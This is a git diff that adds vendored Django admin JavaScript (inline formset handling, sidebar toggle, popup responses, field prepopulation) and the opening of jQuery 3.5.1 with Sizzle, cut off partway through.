$("#id_" + options.prefix + "-MAX_NUM_FORMS").prop("autocomplete", "off"); + const minForms = $("#id_" + options.prefix + "-MIN_NUM_FORMS").prop("autocomplete", "off"); + let addButton; + + /** + * The "Add another MyModel" button below the inline forms. + */ + const addInlineAddButton = function() { + if (addButton === null) { + if ($this.prop("tagName") === "TR") { + // If forms are laid out as table rows, insert the + // "add" button in a new table row: + const numCols = $this.eq(-1).children().length; + $parent.append('' + options.addText + ""); + addButton = $parent.find("tr:last a"); + } else { + // Otherwise, insert it immediately after the last form: + $this.filter(":last").after('"); + addButton = $this.filter(":last").next().find("a"); + } + } + addButton.on('click', addInlineClickHandler); + }; + + const addInlineClickHandler = function(e) { + e.preventDefault(); + const template = $("#" + options.prefix + "-empty"); + const row = template.clone(true); + row.removeClass(options.emptyCssClass) + .addClass(options.formCssClass) + .attr("id", options.prefix + "-" + nextIndex); + addInlineDeleteButton(row); + row.find("*").each(function() { + updateElementIndex(this, options.prefix, totalForms.val()); + }); + // Insert the new form when it has been fully edited. + row.insertBefore($(template)); + // Update number of total forms. + $(totalForms).val(parseInt(totalForms.val(), 10) + 1); + nextIndex += 1; + // Hide the add button if there's a limit and it's been reached. + if ((maxForms.val() !== '') && (maxForms.val() - totalForms.val()) <= 0) { + addButton.parent().hide(); + } + // Show the remove buttons if there are more than min_num. + toggleDeleteButtonVisibility(row.closest('.inline-group')); + + // Pass the new form to the post-add callback, if provided. + if (options.added) { + options.added(row); + } + $(document).trigger('formset:added', [row, options.prefix]); + }; + + /** + * The "X" button that is part of every unsaved inline. + * (When saved, it is replaced with a "Delete" checkbox.) + */ + const addInlineDeleteButton = function(row) { + if (row.is("tr")) { + // If the forms are laid out in table rows, insert + // the remove button into the last table cell: + row.children(":last").append('"); + } else if (row.is("ul") || row.is("ol")) { + // If they're laid out as an ordered/unordered list, + // insert an
  • after the last list item: + row.append('
  • ' + options.deleteText + "
  • "); + } else { + // Otherwise, just insert the remove button as the + // last child element of the form's container: + row.children(":first").append('' + options.deleteText + ""); + } + // Add delete handler for each row. + row.find("a." + options.deleteCssClass).on('click', inlineDeleteHandler.bind(this)); + }; + + const inlineDeleteHandler = function(e1) { + e1.preventDefault(); + const deleteButton = $(e1.target); + const row = deleteButton.closest('.' + options.formCssClass); + const inlineGroup = row.closest('.inline-group'); + // Remove the parent form containing this button, + // and also remove the relevant row with non-field errors: + const prevRow = row.prev(); + if (prevRow.length && prevRow.hasClass('row-form-errors')) { + prevRow.remove(); + } + row.remove(); + nextIndex -= 1; + // Pass the deleted form to the post-delete callback, if provided. + if (options.removed) { + options.removed(row); + } + $(document).trigger('formset:removed', [row, options.prefix]); + // Update the TOTAL_FORMS form count. + const forms = $("." + options.formCssClass); + $("#id_" + options.prefix + "-TOTAL_FORMS").val(forms.length); + // Show add button again once below maximum number. + if ((maxForms.val() === '') || (maxForms.val() - forms.length) > 0) { + addButton.parent().show(); + } + // Hide the remove buttons if at min_num. + toggleDeleteButtonVisibility(inlineGroup); + // Also, update names and ids for all remaining form controls so + // they remain in sequence: + let i, formCount; + const updateElementCallback = function() { + updateElementIndex(this, options.prefix, i); + }; + for (i = 0, formCount = forms.length; i < formCount; i++) { + updateElementIndex($(forms).get(i), options.prefix, i); + $(forms.get(i)).find("*").each(updateElementCallback); + } + }; + + const toggleDeleteButtonVisibility = function(inlineGroup) { + if ((minForms.val() !== '') && (minForms.val() - totalForms.val()) >= 0) { + inlineGroup.find('.inline-deletelink').hide(); + } else { + inlineGroup.find('.inline-deletelink').show(); + } + }; + + $this.each(function(i) { + $(this).not("." + options.emptyCssClass).addClass(options.formCssClass); + }); + + // Create the delete buttons for all unsaved inlines: + $this.filter('.' + options.formCssClass + ':not(.has_original):not(.' + options.emptyCssClass + ')').each(function() { + addInlineDeleteButton($(this)); + }); + toggleDeleteButtonVisibility($this); + + // Create the add button, initially hidden. + addButton = options.addButton; + addInlineAddButton(); + + // Show the add button if allowed to add more items. + // Note that max_num = None translates to a blank string. + const showAddButton = maxForms.val() === '' || (maxForms.val() - totalForms.val()) > 0; + if ($this.length && showAddButton) { + addButton.parent().show(); + } else { + addButton.parent().hide(); + } + + return this; + }; + + /* Setup plugin defaults */ + $.fn.formset.defaults = { + prefix: "form", // The form prefix for your django formset + addText: "add another", // Text for the add link + deleteText: "remove", // Text for the delete link + addCssClass: "add-row", // CSS class applied to the add link + deleteCssClass: "delete-row", // CSS class applied to the delete link + emptyCssClass: "empty-row", // CSS class applied to the empty row + formCssClass: "dynamic-form", // CSS class applied to each form in a formset + added: null, // Function called each time a new form is added + removed: null, // Function called each time a form is deleted + addButton: null // Existing add button to use + }; + + + // Tabular inlines --------------------------------------------------------- + $.fn.tabularFormset = function(selector, options) { + const $rows = $(this); + + const reinitDateTimeShortCuts = function() { + // Reinitialize the calendar and clock widgets by force + if (typeof DateTimeShortcuts !== "undefined") { + $(".datetimeshortcuts").remove(); + DateTimeShortcuts.init(); + } + }; + + const updateSelectFilter = function() { + // If any SelectFilter widgets are a part of the new form, + // instantiate a new SelectFilter instance for it. + if (typeof SelectFilter !== 'undefined') { + $('.selectfilter').each(function(index, value) { + const namearr = value.name.split('-'); + SelectFilter.init(value.id, namearr[namearr.length - 1], false); + }); + $('.selectfilterstacked').each(function(index, value) { + const namearr = value.name.split('-'); + SelectFilter.init(value.id, namearr[namearr.length - 1], true); + }); + } + }; + + const initPrepopulatedFields = function(row) { + row.find('.prepopulated_field').each(function() { + const field = $(this), + input = field.find('input, select, textarea'), + dependency_list = input.data('dependency_list') || [], + dependencies = []; + $.each(dependency_list, function(i, field_name) { + dependencies.push('#' + row.find('.field-' + field_name).find('input, select, textarea').attr('id')); + }); + if (dependencies.length) { + input.prepopulate(dependencies, input.attr('maxlength')); + } + }); + }; + + $rows.formset({ + prefix: options.prefix, + addText: options.addText, + formCssClass: "dynamic-" + options.prefix, + deleteCssClass: "inline-deletelink", + deleteText: options.deleteText, + emptyCssClass: "empty-form", + added: function(row) { + initPrepopulatedFields(row); + reinitDateTimeShortCuts(); + updateSelectFilter(); + }, + addButton: options.addButton + }); + + return $rows; + }; + + // Stacked inlines --------------------------------------------------------- + $.fn.stackedFormset = function(selector, options) { + const $rows = $(this); + const updateInlineLabel = function(row) { + $(selector).find(".inline_label").each(function(i) { + const count = i + 1; + $(this).html($(this).html().replace(/(#\d+)/g, "#" + count)); + }); + }; + + const reinitDateTimeShortCuts = function() { + // Reinitialize the calendar and clock widgets by force, yuck. + if (typeof DateTimeShortcuts !== "undefined") { + $(".datetimeshortcuts").remove(); + DateTimeShortcuts.init(); + } + }; + + const updateSelectFilter = function() { + // If any SelectFilter widgets were added, instantiate a new instance. + if (typeof SelectFilter !== "undefined") { + $(".selectfilter").each(function(index, value) { + const namearr = value.name.split('-'); + SelectFilter.init(value.id, namearr[namearr.length - 1], false); + }); + $(".selectfilterstacked").each(function(index, value) { + const namearr = value.name.split('-'); + SelectFilter.init(value.id, namearr[namearr.length - 1], true); + }); + } + }; + + const initPrepopulatedFields = function(row) { + row.find('.prepopulated_field').each(function() { + const field = $(this), + input = field.find('input, select, textarea'), + dependency_list = input.data('dependency_list') || [], + dependencies = []; + $.each(dependency_list, function(i, field_name) { + dependencies.push('#' + row.find('.form-row .field-' + field_name).find('input, select, textarea').attr('id')); + }); + if (dependencies.length) { + input.prepopulate(dependencies, input.attr('maxlength')); + } + }); + }; + + $rows.formset({ + prefix: options.prefix, + addText: options.addText, + formCssClass: "dynamic-" + options.prefix, + deleteCssClass: "inline-deletelink", + deleteText: options.deleteText, + emptyCssClass: "empty-form", + removed: updateInlineLabel, + added: function(row) { + initPrepopulatedFields(row); + reinitDateTimeShortCuts(); + updateSelectFilter(); + updateInlineLabel(row); + }, + addButton: options.addButton + }); + + return $rows; + }; + + $(document).ready(function() { + $(".js-inline-admin-formset").each(function() { + const data = $(this).data(), + inlineOptions = data.inlineFormset; + let selector; + switch(data.inlineType) { + case "stacked": + selector = inlineOptions.name + "-group .inline-related"; + $(selector).stackedFormset(selector, inlineOptions.options); + break; + case "tabular": + selector = inlineOptions.name + "-group .tabular.inline-related tbody:first > tr.form-row"; + $(selector).tabularFormset(selector, inlineOptions.options); + break; + } + }); + }); +} diff --git a/master/static/admin/js/inlines.min.js b/master/static/admin/js/inlines.min.js new file mode 100644 index 0000000..fc6dddc --- /dev/null +++ b/master/static/admin/js/inlines.min.js @@ -0,0 +1,11 @@ +'use strict';{const b=django.jQuery;b.fn.formset=function(c){const a=b.extend({},b.fn.formset.defaults,c),e=b(this),l=e.parent(),m=function(a,d,h){const g=new RegExp("("+d+"-(\\d+|__prefix__))");d=d+"-"+h;b(a).prop("for")&&b(a).prop("for",b(a).prop("for").replace(g,d));a.id&&(a.id=a.id.replace(g,d));a.name&&(a.name=a.name.replace(g,d))},f=b("#id_"+a.prefix+"-TOTAL_FORMS").prop("autocomplete","off");let n=parseInt(f.val(),10);const h=b("#id_"+a.prefix+"-MAX_NUM_FORMS").prop("autocomplete","off"),q= +b("#id_"+a.prefix+"-MIN_NUM_FORMS").prop("autocomplete","off");let k;const t=function(g){g.preventDefault();g=b("#"+a.prefix+"-empty");const d=g.clone(!0);d.removeClass(a.emptyCssClass).addClass(a.formCssClass).attr("id",a.prefix+"-"+n);r(d);d.find("*").each(function(){m(this,a.prefix,f.val())});d.insertBefore(b(g));b(f).val(parseInt(f.val(),10)+1);n+=1;""!==h.val()&&0>=h.val()-f.val()&&k.parent().hide();p(d.closest(".inline-group"));a.added&&a.added(d);b(document).trigger("formset:added",[d,a.prefix])}, +r=function(b){b.is("tr")?b.children(":last").append('"):b.is("ul")||b.is("ol")?b.append('
  • '+a.deleteText+"
  • "):b.children(":first").append(''+a.deleteText+"");b.find("a."+a.deleteCssClass).on("click",u.bind(this))},u=function(g){g.preventDefault();var d=b(g.target).closest("."+a.formCssClass);g=d.closest(".inline-group"); +var f=d.prev();f.length&&f.hasClass("row-form-errors")&&f.remove();d.remove();--n;a.removed&&a.removed(d);b(document).trigger("formset:removed",[d,a.prefix]);d=b("."+a.formCssClass);b("#id_"+a.prefix+"-TOTAL_FORMS").val(d.length);(""===h.val()||0'+a.addText+"");k=l.find("tr:last a")}else e.filter(":last").after('"), +k=e.filter(":last").next().find("a");k.on("click",t)})();c=""===h.val()||0 tr.form-row",b(c).tabularFormset(c,a.options)}})})}; diff --git a/master/static/admin/js/jquery.init.js b/master/static/admin/js/jquery.init.js new file mode 100644 index 0000000..f40b27f --- /dev/null +++ b/master/static/admin/js/jquery.init.js @@ -0,0 +1,8 @@ +/*global jQuery:false*/ +'use strict'; +/* Puts the included jQuery into our own namespace using noConflict and passing + * it 'true'. This ensures that the included jQuery doesn't pollute the global + * namespace (i.e. this preserves pre-existing values for both window.$ and + * window.jQuery). + */ +window.django = {jQuery: jQuery.noConflict(true)}; diff --git a/master/static/admin/js/nav_sidebar.js b/master/static/admin/js/nav_sidebar.js new file mode 100644 index 0000000..efaa721 --- /dev/null +++ b/master/static/admin/js/nav_sidebar.js @@ -0,0 +1,39 @@ +'use strict'; +{ + const toggleNavSidebar = document.getElementById('toggle-nav-sidebar'); + if (toggleNavSidebar !== null) { + const navLinks = document.querySelectorAll('#nav-sidebar a'); + function disableNavLinkTabbing() { + for (const navLink of navLinks) { + navLink.tabIndex = -1; + } + } + function enableNavLinkTabbing() { + for (const navLink of navLinks) { + navLink.tabIndex = 0; + } + } + + const main = document.getElementById('main'); + let navSidebarIsOpen = localStorage.getItem('django.admin.navSidebarIsOpen'); + if (navSidebarIsOpen === null) { + navSidebarIsOpen = 'true'; + } + if (navSidebarIsOpen === 'false') { + disableNavLinkTabbing(); + } + main.classList.toggle('shifted', navSidebarIsOpen === 'true'); + + toggleNavSidebar.addEventListener('click', function() { + if (navSidebarIsOpen === 'true') { + navSidebarIsOpen = 'false'; + disableNavLinkTabbing(); + } else { + navSidebarIsOpen = 'true'; + enableNavLinkTabbing(); + } + localStorage.setItem('django.admin.navSidebarIsOpen', navSidebarIsOpen); + main.classList.toggle('shifted'); + }); + } +} diff --git a/master/static/admin/js/popup_response.js b/master/static/admin/js/popup_response.js new file mode 100644 index 0000000..2b1d3dd --- /dev/null +++ b/master/static/admin/js/popup_response.js @@ -0,0 +1,16 @@ +/*global opener */ +'use strict'; +{ + const initData = JSON.parse(document.getElementById('django-admin-popup-response-constants').dataset.popupResponse); + switch(initData.action) { + case 'change': + opener.dismissChangeRelatedObjectPopup(window, initData.value, initData.obj, initData.new_value); + break; + case 'delete': + opener.dismissDeleteRelatedObjectPopup(window, initData.value); + break; + default: + opener.dismissAddRelatedObjectPopup(window, initData.value, initData.obj); + break; + } +} diff --git a/master/static/admin/js/prepopulate.js b/master/static/admin/js/prepopulate.js new file mode 100644 index 0000000..89e95ab --- /dev/null +++ b/master/static/admin/js/prepopulate.js @@ -0,0 +1,43 @@ +/*global URLify*/ +'use strict'; +{ + const $ = django.jQuery; + $.fn.prepopulate = function(dependencies, maxLength, allowUnicode) { + /* + Depends on urlify.js + Populates a selected field with the values of the dependent fields, + URLifies and shortens the string. + dependencies - array of dependent fields ids + maxLength - maximum length of the URLify'd string + allowUnicode - Unicode support of the URLify'd string + */ + return this.each(function() { + const prepopulatedField = $(this); + + const populate = function() { + // Bail if the field's value has been changed by the user + if (prepopulatedField.data('_changed')) { + return; + } + + const values = []; + $.each(dependencies, function(i, field) { + field = $(field); + if (field.val().length > 0) { + values.push(field.val()); + } + }); + prepopulatedField.val(URLify(values.join(' '), maxLength, allowUnicode)); + }; + + prepopulatedField.data('_changed', false); + prepopulatedField.on('change', function() { + prepopulatedField.data('_changed', true); + }); + + if (!prepopulatedField.val()) { + $(dependencies.join(',')).on('keyup change focus', populate); + } + }); + }; +} diff --git a/master/static/admin/js/prepopulate.min.js b/master/static/admin/js/prepopulate.min.js new file mode 100644 index 0000000..11ead49 --- /dev/null +++ b/master/static/admin/js/prepopulate.min.js @@ -0,0 +1 @@ +'use strict';{const b=django.jQuery;b.fn.prepopulate=function(d,f,g){return this.each(function(){const a=b(this),h=function(){if(!a.data("_changed")){var e=[];b.each(d,function(a,c){c=b(c);0 elements + // (i.e., `typeof document.createElement( "object" ) === "function"`). + // We don't want to classify *any* DOM node as a function. + return typeof obj === "function" && typeof obj.nodeType !== "number"; + }; + + +var isWindow = function isWindow( obj ) { + return obj != null && obj === obj.window; + }; + + +var document = window.document; + + + + var preservedScriptAttributes = { + type: true, + src: true, + nonce: true, + noModule: true + }; + + function DOMEval( code, node, doc ) { + doc = doc || document; + + var i, val, + script = doc.createElement( "script" ); + + script.text = code; + if ( node ) { + for ( i in preservedScriptAttributes ) { + + // Support: Firefox 64+, Edge 18+ + // Some browsers don't support the "nonce" property on scripts. + // On the other hand, just using `getAttribute` is not enough as + // the `nonce` attribute is reset to an empty string whenever it + // becomes browsing-context connected. + // See https://github.com/whatwg/html/issues/2369 + // See https://html.spec.whatwg.org/#nonce-attributes + // The `node.getAttribute` check was added for the sake of + // `jQuery.globalEval` so that it can fake a nonce-containing node + // via an object. + val = node[ i ] || node.getAttribute && node.getAttribute( i ); + if ( val ) { + script.setAttribute( i, val ); + } + } + } + doc.head.appendChild( script ).parentNode.removeChild( script ); + } + + +function toType( obj ) { + if ( obj == null ) { + return obj + ""; + } + + // Support: Android <=2.3 only (functionish RegExp) + return typeof obj === "object" || typeof obj === "function" ? + class2type[ toString.call( obj ) ] || "object" : + typeof obj; +} +/* global Symbol */ +// Defining this global in .eslintrc.json would create a danger of using the global +// unguarded in another place, it seems safer to define global only for this module + + + +var + version = "3.5.1", + + // Define a local copy of jQuery + jQuery = function( selector, context ) { + + // The jQuery object is actually just the init constructor 'enhanced' + // Need init if jQuery is called (just allow error to be thrown if not included) + return new jQuery.fn.init( selector, context ); + }; + +jQuery.fn = jQuery.prototype = { + + // The current version of jQuery being used + jquery: version, + + constructor: jQuery, + + // The default length of a jQuery object is 0 + length: 0, + + toArray: function() { + return slice.call( this ); + }, + + // Get the Nth element in the matched element set OR + // Get the whole matched element set as a clean array + get: function( num ) { + + // Return all the elements in a clean array + if ( num == null ) { + return slice.call( this ); + } + + // Return just the one element from the set + return num < 0 ? this[ num + this.length ] : this[ num ]; + }, + + // Take an array of elements and push it onto the stack + // (returning the new matched element set) + pushStack: function( elems ) { + + // Build a new jQuery matched element set + var ret = jQuery.merge( this.constructor(), elems ); + + // Add the old object onto the stack (as a reference) + ret.prevObject = this; + + // Return the newly-formed element set + return ret; + }, + + // Execute a callback for every element in the matched set. + each: function( callback ) { + return jQuery.each( this, callback ); + }, + + map: function( callback ) { + return this.pushStack( jQuery.map( this, function( elem, i ) { + return callback.call( elem, i, elem ); + } ) ); + }, + + slice: function() { + return this.pushStack( slice.apply( this, arguments ) ); + }, + + first: function() { + return this.eq( 0 ); + }, + + last: function() { + return this.eq( -1 ); + }, + + even: function() { + return this.pushStack( jQuery.grep( this, function( _elem, i ) { + return ( i + 1 ) % 2; + } ) ); + }, + + odd: function() { + return this.pushStack( jQuery.grep( this, function( _elem, i ) { + return i % 2; + } ) ); + }, + + eq: function( i ) { + var len = this.length, + j = +i + ( i < 0 ? len : 0 ); + return this.pushStack( j >= 0 && j < len ? [ this[ j ] ] : [] ); + }, + + end: function() { + return this.prevObject || this.constructor(); + }, + + // For internal use only. + // Behaves like an Array's method, not like a jQuery method. + push: push, + sort: arr.sort, + splice: arr.splice +}; + +jQuery.extend = jQuery.fn.extend = function() { + var options, name, src, copy, copyIsArray, clone, + target = arguments[ 0 ] || {}, + i = 1, + length = arguments.length, + deep = false; + + // Handle a deep copy situation + if ( typeof target === "boolean" ) { + deep = target; + + // Skip the boolean and the target + target = arguments[ i ] || {}; + i++; + } + + // Handle case when target is a string or something (possible in deep copy) + if ( typeof target !== "object" && !isFunction( target ) ) { + target = {}; + } + + // Extend jQuery itself if only one argument is passed + if ( i === length ) { + target = this; + i--; + } + + for ( ; i < length; i++ ) { + + // Only deal with non-null/undefined values + if ( ( options = arguments[ i ] ) != null ) { + + // Extend the base object + for ( name in options ) { + copy = options[ name ]; + + // Prevent Object.prototype pollution + // Prevent never-ending loop + if ( name === "__proto__" || target === copy ) { + continue; + } + + // Recurse if we're merging plain objects or arrays + if ( deep && copy && ( jQuery.isPlainObject( copy ) || + ( copyIsArray = Array.isArray( copy ) ) ) ) { + src = target[ name ]; + + // Ensure proper type for the source value + if ( copyIsArray && !Array.isArray( src ) ) { + clone = []; + } else if ( !copyIsArray && !jQuery.isPlainObject( src ) ) { + clone = {}; + } else { + clone = src; + } + copyIsArray = false; + + // Never move original objects, clone them + target[ name ] = jQuery.extend( deep, clone, copy ); + + // Don't bring in undefined values + } else if ( copy !== undefined ) { + target[ name ] = copy; + } + } + } + } + + // Return the modified object + return target; +}; + +jQuery.extend( { + + // Unique for each copy of jQuery on the page + expando: "jQuery" + ( version + Math.random() ).replace( /\D/g, "" ), + + // Assume jQuery is ready without the ready module + isReady: true, + + error: function( msg ) { + throw new Error( msg ); + }, + + noop: function() {}, + + isPlainObject: function( obj ) { + var proto, Ctor; + + // Detect obvious negatives + // Use toString instead of jQuery.type to catch host objects + if ( !obj || toString.call( obj ) !== "[object Object]" ) { + return false; + } + + proto = getProto( obj ); + + // Objects with no prototype (e.g., `Object.create( null )`) are plain + if ( !proto ) { + return true; + } + + // Objects with prototype are plain iff they were constructed by a global Object function + Ctor = hasOwn.call( proto, "constructor" ) && proto.constructor; + return typeof Ctor === "function" && fnToString.call( Ctor ) === ObjectFunctionString; + }, + + isEmptyObject: function( obj ) { + var name; + + for ( name in obj ) { + return false; + } + return true; + }, + + // Evaluates a script in a provided context; falls back to the global one + // if not specified. + globalEval: function( code, options, doc ) { + DOMEval( code, { nonce: options && options.nonce }, doc ); + }, + + each: function( obj, callback ) { + var length, i = 0; + + if ( isArrayLike( obj ) ) { + length = obj.length; + for ( ; i < length; i++ ) { + if ( callback.call( obj[ i ], i, obj[ i ] ) === false ) { + break; + } + } + } else { + for ( i in obj ) { + if ( callback.call( obj[ i ], i, obj[ i ] ) === false ) { + break; + } + } + } + + return obj; + }, + + // results is for internal usage only + makeArray: function( arr, results ) { + var ret = results || []; + + if ( arr != null ) { + if ( isArrayLike( Object( arr ) ) ) { + jQuery.merge( ret, + typeof arr === "string" ? + [ arr ] : arr + ); + } else { + push.call( ret, arr ); + } + } + + return ret; + }, + + inArray: function( elem, arr, i ) { + return arr == null ? -1 : indexOf.call( arr, elem, i ); + }, + + // Support: Android <=4.0 only, PhantomJS 1 only + // push.apply(_, arraylike) throws on ancient WebKit + merge: function( first, second ) { + var len = +second.length, + j = 0, + i = first.length; + + for ( ; j < len; j++ ) { + first[ i++ ] = second[ j ]; + } + + first.length = i; + + return first; + }, + + grep: function( elems, callback, invert ) { + var callbackInverse, + matches = [], + i = 0, + length = elems.length, + callbackExpect = !invert; + + // Go through the array, only saving the items + // that pass the validator function + for ( ; i < length; i++ ) { + callbackInverse = !callback( elems[ i ], i ); + if ( callbackInverse !== callbackExpect ) { + matches.push( elems[ i ] ); + } + } + + return matches; + }, + + // arg is for internal usage only + map: function( elems, callback, arg ) { + var length, value, + i = 0, + ret = []; + + // Go through the array, translating each of the items to their new values + if ( isArrayLike( elems ) ) { + length = elems.length; + for ( ; i < length; i++ ) { + value = callback( elems[ i ], i, arg ); + + if ( value != null ) { + ret.push( value ); + } + } + + // Go through every key on the object, + } else { + for ( i in elems ) { + value = callback( elems[ i ], i, arg ); + + if ( value != null ) { + ret.push( value ); + } + } + } + + // Flatten any nested arrays + return flat( ret ); + }, + + // A global GUID counter for objects + guid: 1, + + // jQuery.support is not used in Core but other projects attach their + // properties to it so it needs to exist. + support: support +} ); + +if ( typeof Symbol === "function" ) { + jQuery.fn[ Symbol.iterator ] = arr[ Symbol.iterator ]; +} + +// Populate the class2type map +jQuery.each( "Boolean Number String Function Array Date RegExp Object Error Symbol".split( " " ), +function( _i, name ) { + class2type[ "[object " + name + "]" ] = name.toLowerCase(); +} ); + +function isArrayLike( obj ) { + + // Support: real iOS 8.2 only (not reproducible in simulator) + // `in` check used to prevent JIT error (gh-2145) + // hasOwn isn't used here due to false negatives + // regarding Nodelist length in IE + var length = !!obj && "length" in obj && obj.length, + type = toType( obj ); + + if ( isFunction( obj ) || isWindow( obj ) ) { + return false; + } + + return type === "array" || length === 0 || + typeof length === "number" && length > 0 && ( length - 1 ) in obj; +} +var Sizzle = +/*! + * Sizzle CSS Selector Engine v2.3.5 + * https://sizzlejs.com/ + * + * Copyright JS Foundation and other contributors + * Released under the MIT license + * https://js.foundation/ + * + * Date: 2020-03-14 + */ +( function( window ) { +var i, + support, + Expr, + getText, + isXML, + tokenize, + compile, + select, + outermostContext, + sortInput, + hasDuplicate, + + // Local document vars + setDocument, + document, + docElem, + documentIsHTML, + rbuggyQSA, + rbuggyMatches, + matches, + contains, + + // Instance-specific data + expando = "sizzle" + 1 * new Date(), + preferredDoc = window.document, + dirruns = 0, + done = 0, + classCache = createCache(), + tokenCache = createCache(), + compilerCache = createCache(), + nonnativeSelectorCache = createCache(), + sortOrder = function( a, b ) { + if ( a === b ) { + hasDuplicate = true; + } + return 0; + }, + + // Instance methods + hasOwn = ( {} ).hasOwnProperty, + arr = [], + pop = arr.pop, + pushNative = arr.push, + push = arr.push, + slice = arr.slice, + + // Use a stripped-down indexOf as it's faster than native + // https://jsperf.com/thor-indexof-vs-for/5 + indexOf = function( list, elem ) { + var i = 0, + len = list.length; + for ( ; i < len; i++ ) { + if ( list[ i ] === elem ) { + return i; + } + } + return -1; + }, + + booleans = "checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|" + + "ismap|loop|multiple|open|readonly|required|scoped", + + // Regular expressions + + // http://www.w3.org/TR/css3-selectors/#whitespace + whitespace = "[\\x20\\t\\r\\n\\f]", + + // https://www.w3.org/TR/css-syntax-3/#ident-token-diagram + identifier = "(?:\\\\[\\da-fA-F]{1,6}" + whitespace + + "?|\\\\[^\\r\\n\\f]|[\\w-]|[^\0-\\x7f])+", + + // Attribute selectors: http://www.w3.org/TR/selectors/#attribute-selectors + attributes = "\\[" + whitespace + "*(" + identifier + ")(?:" + whitespace + + + // Operator (capture 2) + "*([*^$|!~]?=)" + whitespace + + + // "Attribute values must be CSS identifiers [capture 5] + // or strings [capture 3 or capture 4]" + "*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|(" + identifier + "))|)" + + whitespace + "*\\]", + + pseudos = ":(" + identifier + ")(?:\\((" + + + // To reduce the number of selectors needing tokenize in the preFilter, prefer arguments: + // 1. quoted (capture 3; capture 4 or capture 5) + "('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|" + + + // 2. simple (capture 6) + "((?:\\\\.|[^\\\\()[\\]]|" + attributes + ")*)|" + + + // 3. anything else (capture 2) + ".*" + + ")\\)|)", + + // Leading and non-escaped trailing whitespace, capturing some non-whitespace characters preceding the latter + rwhitespace = new RegExp( whitespace + "+", "g" ), + rtrim = new RegExp( "^" + whitespace + "+|((?:^|[^\\\\])(?:\\\\.)*)" + + whitespace + "+$", "g" ), + + rcomma = new RegExp( "^" + whitespace + "*," + whitespace + "*" ), + rcombinators = new RegExp( "^" + whitespace + "*([>+~]|" + whitespace + ")" + whitespace + + "*" ), + rdescend = new RegExp( whitespace + "|>" ), + + rpseudo = new RegExp( pseudos ), + ridentifier = new RegExp( "^" + identifier + "$" ), + + matchExpr = { + "ID": new RegExp( "^#(" + identifier + ")" ), + "CLASS": new RegExp( "^\\.(" + identifier + ")" ), + "TAG": new RegExp( "^(" + identifier + "|[*])" ), + "ATTR": new RegExp( "^" + attributes ), + "PSEUDO": new RegExp( "^" + pseudos ), + "CHILD": new RegExp( "^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\(" + + whitespace + "*(even|odd|(([+-]|)(\\d*)n|)" + whitespace + "*(?:([+-]|)" + + whitespace + "*(\\d+)|))" + whitespace + "*\\)|)", "i" ), + "bool": new RegExp( "^(?:" + booleans + ")$", "i" ), + + // For use in libraries implementing .is() + // We use this for POS matching in `select` + "needsContext": new RegExp( "^" + whitespace + + "*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\(" + whitespace + + "*((?:-\\d)?\\d*)" + whitespace + "*\\)|)(?=[^-]|$)", "i" ) + }, + + rhtml = /HTML$/i, + rinputs = /^(?:input|select|textarea|button)$/i, + rheader = /^h\d$/i, + + rnative = /^[^{]+\{\s*\[native \w/, + + // Easily-parseable/retrievable ID or TAG or CLASS selectors + rquickExpr = /^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/, + + rsibling = /[+~]/, + + // CSS escapes + // http://www.w3.org/TR/CSS21/syndata.html#escaped-characters + runescape = new RegExp( "\\\\[\\da-fA-F]{1,6}" + whitespace + "?|\\\\([^\\r\\n\\f])", "g" ), + funescape = function( escape, nonHex ) { + var high = "0x" + escape.slice( 1 ) - 0x10000; + + return nonHex ? + + // Strip the backslash prefix from a non-hex escape sequence + nonHex : + + // Replace a hexadecimal escape sequence with the encoded Unicode code point + // Support: IE <=11+ + // For values outside the Basic Multilingual Plane (BMP), manually construct a + // surrogate pair + high < 0 ? + String.fromCharCode( high + 0x10000 ) : + String.fromCharCode( high >> 10 | 0xD800, high & 0x3FF | 0xDC00 ); + }, + + // CSS string/identifier serialization + // https://drafts.csswg.org/cssom/#common-serializing-idioms + rcssescape = /([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\x7f-\uFFFF\w-]/g, + fcssescape = function( ch, asCodePoint ) { + if ( asCodePoint ) { + + // U+0000 NULL becomes U+FFFD REPLACEMENT CHARACTER + if ( ch === "\0" ) { + return "\uFFFD"; + } + + // Control characters and (dependent upon position) numbers get escaped as code points + return ch.slice( 0, -1 ) + "\\" + + ch.charCodeAt( ch.length - 1 ).toString( 16 ) + " "; + } + + // Other potentially-special ASCII characters get backslash-escaped + return "\\" + ch; + }, + + // Used for iframes + // See setDocument() + // Removing the function wrapper causes a "Permission Denied" + // error in IE + unloadHandler = function() { + setDocument(); + }, + + inDisabledFieldset = addCombinator( + function( elem ) { + return elem.disabled === true && elem.nodeName.toLowerCase() === "fieldset"; + }, + { dir: "parentNode", next: "legend" } + ); + +// Optimize for push.apply( _, NodeList ) +try { + push.apply( + ( arr = slice.call( preferredDoc.childNodes ) ), + preferredDoc.childNodes + ); + + // Support: Android<4.0 + // Detect silently failing push.apply + // eslint-disable-next-line no-unused-expressions + arr[ preferredDoc.childNodes.length ].nodeType; +} catch ( e ) { + push = { apply: arr.length ? + + // Leverage slice if possible + function( target, els ) { + pushNative.apply( target, slice.call( els ) ); + } : + + // Support: IE<9 + // Otherwise append directly + function( target, els ) { + var j = target.length, + i = 0; + + // Can't trust NodeList.length + while ( ( target[ j++ ] = els[ i++ ] ) ) {} + target.length = j - 1; + } + }; +} + +function Sizzle( selector, context, results, seed ) { + var m, i, elem, nid, match, groups, newSelector, + newContext = context && context.ownerDocument, + + // nodeType defaults to 9, since context defaults to document + nodeType = context ? context.nodeType : 9; + + results = results || []; + + // Return early from calls with invalid selector or context + if ( typeof selector !== "string" || !selector || + nodeType !== 1 && nodeType !== 9 && nodeType !== 11 ) { + + return results; + } + + // Try to shortcut find operations (as opposed to filters) in HTML documents + if ( !seed ) { + setDocument( context ); + context = context || document; + + if ( documentIsHTML ) { + + // If the selector is sufficiently simple, try using a "get*By*" DOM method + // (excepting DocumentFragment context, where the methods don't exist) + if ( nodeType !== 11 && ( match = rquickExpr.exec( selector ) ) ) { + + // ID selector + if ( ( m = match[ 1 ] ) ) { + + // Document context + if ( nodeType === 9 ) { + if ( ( elem = context.getElementById( m ) ) ) { + + // Support: IE, Opera, Webkit + // TODO: identify versions + // 